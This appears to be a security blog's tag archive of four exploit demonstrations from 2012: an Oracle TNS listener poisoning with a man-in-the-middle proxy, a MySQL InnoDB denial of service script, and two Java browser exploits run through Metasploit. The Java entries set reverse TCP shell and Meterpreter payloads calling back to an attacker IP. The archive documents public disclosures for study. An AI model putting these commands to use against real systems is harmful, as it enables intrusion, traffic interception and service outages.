Tag Archives: Oracle

CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

Exploits

Timeline :

Vulnerability discovered by Joxean Koret in 2008
Vulberability reported to the vendor by Joxean Koret in 2008
Public release of the vulnerability in Oracle CPU by the vendor the 2012-04-17
Details and PoC of the vulnerability released by Joxean Koret the 2012-04-18
Fake patching of the vulnerability discovered by Joxean Koret the 2012-04-26

PoC provided by :

Joxean Koret

Reference(s) :

Oracle CPU of April 2012
Joxean Koret details and PoC
CVE-2012-1675
Oracle Security Alert for CVE-2012-1675

Affected version(s) :

All versions of Oracle Database

Tested with :

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0

Description :

Usage of Joxean Koret PoC require that the database name has a length of 6 characters.

Database server characteristics :

IP : 192.168.178.150
Oracle version : 10.2.0.4.0
Database listener port : 1521
Database listener has no clients IPs restrictions
Database name : arcsig
Database username : arcsig
Database password : testtest

Database client characteristics :

IP : 192.168.178.151
SQL*Plus version : 10.2.0.4.0

tnsnames.ora” file as bellow :

TARGET.DB=
(DESCRIPTION =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521))
(CONNECT_DATA =
(SERVICE_NAME= arcsig)
)
)

Attacker characteristics :

IP : 192.168.178.100
Usage of PoC provided by Joxean Koret

Demonstration :

PoC validation phase

On database server :

ifconfig
ps faux
netstat -tan

On database client :

ifconfig
sqlplus -v
cat tnsnames.ora
sqlplus [email protected]
HELP
QUIT

PoC exploitation phase

On attacker :

Start the MITM proxy, how will intercept the communication between the client and the database :

sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521

Start the vulnerability exploitation :

python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521

On the database client :

Connect with SQL*Plus
sqlplus [email protected]
?
? INDEX
TOTO
QUIT

You can see that the communication are intercepted by the proxy.

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Exploits, ,

Timeline :

Public release of the vulnerabilities the 2012-03-21
Details of the vulnerability published by Oracle the 2012-04-10
PoC provided by Oracle the 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

Oracle has release, the 21 March, two new versions of MySQL, version 5.5.22 and 5.1.62. These versions have fix two bugs #13510739 and #63775 how are considered as security fixes. But no impact details of these bugs are provided and the bugs report are closed.
Unfortunately for Oracle the two new versions were shipped with a development script “mysql-test/suite/innodb/t/innodb_bug13510739.test” in order to test the fix of the vulnerabilities, a PoC provided by Oracle. The bugs cause a denial of service of MySQL “ON HANDLER READ NEXT AFTER DELETE RECORD“. All the details are available in the script or on the upper Pastebin link.

Commands :

mysql -u root -p database < innodb_bug13510739.test

CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29

PoC provided by :

Jeroen Frijters
sinn3r
juan vazquez
egypt

Reference(s) :

CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before

Tested on Windows XP Pro SP3 with :

Oracle Java SE 6 Update 16
Internet Explorer 8

Description :

This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_atomicreferencearray
SET SRVHOST 192.168.178.100
SET PAYLOAD generic/shell_reverse_tcp 
set LHOST 192.168.178.100
exploit

CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability “ZDI-12-037” reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for “ZDI-12-037”
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid